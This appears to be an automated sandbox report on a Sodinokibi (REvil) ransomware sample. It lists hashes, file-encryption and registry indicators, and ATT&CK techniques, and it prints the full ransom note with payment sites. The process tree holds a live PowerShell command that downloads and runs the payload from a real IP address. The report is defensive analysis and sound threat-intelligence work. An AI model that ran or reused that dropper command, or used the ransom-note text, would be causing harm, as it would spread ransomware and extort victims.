sodinokibi | 9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391

General

Target

148191c5edb43b691f1df387dc563507.bat
Size

216B
MD5

136cfde5a2f54a7d8742d25570058e5c
SHA1

4c5f2992b01fa216311c261996c0ac751485f533
SHA256

9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391
SHA512

5328bc43411d7761f39c13c213cb10f6da9b81be55e8031ab77ca34fd1aeeac7d0290cd86ba0951d5f232e43fd3a738a54c601dd0c1518481750758e2611eca3

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507

Extracted

Path

C:\30972ehjnb-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 30972ehjnb. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+]WE HAVE STEALED YOUR DATA FROM SERVERS AND ARE READY TO PUBLISH THEM IN PUBLIC ACCESS (USE TOR BROWSER TO VIEW)[+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/146?s=af64e6481d5f3e44b6b5bfc04cfef40c [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/847FCBD1B7E34899 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/847FCBD1B7E34899 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ZNz74AqZ5T+qqzgTFov80LbIZW4oeoDVp+2EWCLX8ZNcpckKyFuSX1tdA60yRbje aY84qi15FU7cYXCmTQki8bM3OH0QVr26Heb+Qv0CMmj3wGwko4gUm+J7Kb62ne/6 ClppyWQL3rcfpryMx1grnrrPkVqDIKuueVXFClBd6318q2bYMcVomfBklqVi9dGT MwZShUsC/iq8Jyqzk0In0CyTNHSuenbHZeRyw6FQlW0MG4BiyBjJEvGC4mJJrIIo SGI36qNnUoHXJMeO005bF4/rsQ0Cp+GtSIxNOLvGJYj0FLUbQZUWCsTtM0KQRa71 VulP6jqKzPgrn+/wrekMQYBpUDOMWyNwxUZ3GB2aRVADuRw5HpXWh5cmeEWDK1rG Z7gaTHyJ22qn1SPzc+kXvEX51O7A7muPfVyJfefEjI4zN8uuQsdxfG+fTiSMOykP umTXX77xF1ZB5IvXsIXdILNm6/Vu/HY87NqY0bFLCGu+fOfPwVFcNAaNC7LRCy3P evdB0Xs/PMoQGKATxbGly9TlqUrfa5Da7/LgI1/g2V0trm/hEkEAlduYdGrRgdV8 W9Ywr0YIIFmyqFvUK6sDRfb9fkHIoZzrtOXslsIzgvsfWxvaJvzOfzmii+k3Gibg H9Zyp/Zy6z+1k+ZluM5VAb7L/7KaPTbcEEYRVt2mdLAOwE/6MydQbLiqH0jpRbAH iXG3I5t0jC5Yt/4/RmAX/QVugwdYhNmVcFNjyJvPDdRYjUsiT38wvs0GVAZ8b09r GWZhS1yh6OBXeZp+Y85AWOMQjXOKVn54R7X48T54ceIcMSvSBjGhXTivqn2oQ9wx o7ixMR0oNu5xsGNNyfDaOM+qrj7NAlutUcaYaArQsb3ucs6/Jtw5vLXQG5u5P/Oy EBVQrlRvdbFNgZ44cPnkBj2oYJEh3Bw0hUyi89wzDLt1sCt/NyfCdeIMcgRbgSsd 9cSsMkSCnIg+07yFA2E8EOMzgByPRgjYmGN9ZwKOA8/b6xNu6O1PTvZeouJ28gNt LsRMxUcrd/DMn1at52XDkXrVf/40nB0BVMTguP1XYPiJQqp2rDiUTAUqRvU9L2Gm d+jvGeETtdZPahePKkYQJhEOIvm+mjsH5MomExIyx/5ooUsy71C0PABV5kaY6cKK OixkXG9m8JiIJq+ICAfdty/QGgLO4M98WsIyjjqQ+dIrJpuKwtMyTtLwEr/N+EwC FdiDoxGp+LwBM1R2WwltdvKK7lSVnfF1AXAieo4wuyVyHw+KgUN5hzZY7rSA1VJ+ yqwSFXmbTsKnfUebCUIsCPlOv8KoSTHt ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/847FCBD1B7E34899

http://decryptor.cc/847FCBD1B7E34899

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 3652 powershell.exe

flow	pid	process
1	3652	powershell.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\UnregisterDisconnect.crw => \??\c:\users\admin\pictures\UnregisterDisconnect.crw.30972ehjnb	powershell.exe
File renamed	C:\Users\Admin\Pictures\HideResolve.crw => \??\c:\users\admin\pictures\HideResolve.crw.30972ehjnb	powershell.exe
File renamed	C:\Users\Admin\Pictures\InstallRestart.tif => \??\c:\users\admin\pictures\InstallRestart.tif.30972ehjnb	powershell.exe
File renamed	C:\Users\Admin\Pictures\PushUnpublish.png => \??\c:\users\admin\pictures\PushUnpublish.png.30972ehjnb	powershell.exe
File renamed	C:\Users\Admin\Pictures\SearchCheckpoint.png => \??\c:\users\admin\pictures\SearchCheckpoint.png.30972ehjnb	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\34z4898.bmp"	powershell.exe

Drops file in Program Files directory 39 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\BlockMount.js	powershell.exe
File opened for modification	\??\c:\program files\EditDismount.zip	powershell.exe
File opened for modification	\??\c:\program files\SubmitPop.aifc	powershell.exe
File opened for modification	\??\c:\program files\WatchReceive.ADT	powershell.exe
File opened for modification	\??\c:\program files\AddInvoke.wax	powershell.exe
File opened for modification	\??\c:\program files\CompressFind.potx	powershell.exe
File opened for modification	\??\c:\program files\ResolveOptimize.vbe	powershell.exe
File opened for modification	\??\c:\program files\UseWrite.mid	powershell.exe
File opened for modification	\??\c:\program files\ClearStart.TTS	powershell.exe
File opened for modification	\??\c:\program files\ConnectInstall.xlsm	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromRemove.edrwx	powershell.exe
File opened for modification	\??\c:\program files\ExpandFormat.ppt	powershell.exe
File opened for modification	\??\c:\program files\RevokeUse.css	powershell.exe
File opened for modification	\??\c:\program files\SubmitLock.raw	powershell.exe
File created	\??\c:\program files\30972ehjnb-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\DebugSearch.xlsx	powershell.exe
File opened for modification	\??\c:\program files\DismountExit.xhtml	powershell.exe
File opened for modification	\??\c:\program files\PopEnable.xlt	powershell.exe
File opened for modification	\??\c:\program files\RemoveExport.rtf	powershell.exe
File opened for modification	\??\c:\program files\RenameEdit.rle	powershell.exe
File opened for modification	\??\c:\program files\SetRepair.xltm	powershell.exe
File opened for modification	\??\c:\program files\CompareMount.pub	powershell.exe
File opened for modification	\??\c:\program files\ConfirmEnter.tiff	powershell.exe
File opened for modification	\??\c:\program files\DismountResume.wav	powershell.exe
File opened for modification	\??\c:\program files\LockRestart.asf	powershell.exe
File opened for modification	\??\c:\program files\PopExpand.clr	powershell.exe
File opened for modification	\??\c:\program files\PopUninstall.pptm	powershell.exe
File opened for modification	\??\c:\program files\RegisterAssert.mp3	powershell.exe
File created	\??\c:\program files (x86)\30972ehjnb-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UpdateExit.xps	powershell.exe
File opened for modification	\??\c:\program files\ApproveSubmit.doc	powershell.exe
File opened for modification	\??\c:\program files\ClearBackup.wmv	powershell.exe
File opened for modification	\??\c:\program files\DismountRestart.vdw	powershell.exe
File opened for modification	\??\c:\program files\ResetStep.mp3	powershell.exe
File opened for modification	\??\c:\program files\ResolveRedo.otf	powershell.exe
File opened for modification	\??\c:\program files\SetFormat.pdf	powershell.exe
File opened for modification	\??\c:\program files\UpdateSelect.rm	powershell.exe
File opened for modification	\??\c:\program files\ExpandUnpublish.mpeg	powershell.exe
File opened for modification	\??\c:\program files\SuspendStart.wax	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

3652 powershell.exe
3652 powershell.exe
3652 powershell.exe
3652 powershell.exe
3652 powershell.exe

pid	process
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe
3652	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeTakeOwnershipPrivilege	3652	powershell.exe
Token: SeBackupPrivilege	1564	vssvc.exe
Token: SeRestorePrivilege	1564	vssvc.exe
Token: SeAuditPrivilege	1564	vssvc.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3952 wrote to memory of 3652	3952	cmd.exe	powershell.exe
PID 3952 wrote to memory of 3652	3952	cmd.exe	powershell.exe
PID 3952 wrote to memory of 3652	3952	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\148191c5edb43b691f1df387dc563507.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507');Invoke-GCMRWEZUO;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1564

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3652-0-0x0000000000000000-mapping.dmp

Download
memory/3652-1-0x00000000732F0000-0x00000000739DE000-memory.dmp

Filesize
6.9MB

Download
memory/3652-2-0x0000000002F40000-0x0000000002F41000-memory.dmp

Filesize
4KB

Download
memory/3652-3-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/3652-4-0x0000000007030000-0x0000000007031000-memory.dmp

Filesize
4KB

Download
memory/3652-5-0x00000000071D0000-0x00000000071D1000-memory.dmp

Filesize
4KB

Download
memory/3652-6-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/3652-7-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/3652-8-0x0000000007330000-0x0000000007331000-memory.dmp

Filesize
4KB

Download
memory/3652-9-0x0000000008310000-0x0000000008311000-memory.dmp

Filesize
4KB

Download
memory/3652-10-0x0000000008290000-0x0000000008291000-memory.dmp

Filesize
4KB

Download
memory/3652-11-0x0000000009950000-0x0000000009951000-memory.dmp

Filesize
4KB

Download
memory/3652-12-0x0000000008510000-0x0000000008511000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads